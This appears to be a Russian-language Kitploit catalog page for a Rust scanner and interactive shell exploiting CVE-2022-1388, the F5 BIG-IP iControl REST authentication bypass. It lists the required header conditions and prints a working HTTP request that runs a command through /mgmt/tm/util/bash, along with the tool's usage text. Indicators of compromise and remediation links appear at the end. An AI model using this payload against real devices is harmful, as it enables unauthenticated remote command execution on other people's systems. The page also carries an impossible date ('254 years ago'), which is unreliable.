Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-1388-rs — CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE, написанный на Rust | Kitploit
Инструменты/GitHubGitHub/aancw/cve-2022-1388-rs
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubaancw/cve-2022-1388-rs

CVE-2022-1388-rs

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE, написанный на Rust

Репозиторий
254 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-1388-rs

Сканер и интерактивная оболочка для CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE, написанная на Rust

Краткое описание

Подводя итог, вот обзор необходимых условий запроса для эксплуатации этой уязвимости:

  • Заголовок Connection должен содержать X-F5-Auth-Token
  • Заголовок X-F5-Auth-Token должен присутствовать
  • Заголовок Host должен быть localhost / 127.0.0.1, или заголовок Connection должен содержать X-Forwarded-Host
  • Заголовок Auth должен быть установлен с именем пользователя admin и любым паролем

PoC

root@kitploit:~
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
    "command":"run",
    "utilCmdArgs":"-c id"
}

Настройка LAB

  • Вы можете найти лабораторию здесь

Использование

root@kitploit:~
$ cve_2022_1308_rs -h CVE-2022-1388 PoC 1.0 Petruknisme <[email protected]> Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust USAGE: cve_2022_1388_rs [OPTIONS] --url <URL> OPTIONS: -h, --help Print help information -s, --shell This mode for accessing payload with interactive shell -u, --url <URL> F5 Big-IP target url -V, --version Print version information

Требования

  • Rust
  • Cargo

IoCs

IOCs можно найти в файле журнала /var/log/audit. Неопознанные команды, выполненные через конечную точку mgmt/tm/util/bash, должны вызывать беспокойство.

Устранение

Обновитесь до последней версии или примите меры, следуя инструкциям в бюллетене безопасности F5.

  • https://support.f5.com/csp/article/K23605346

Ссылки

  • https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
Скачать инструмент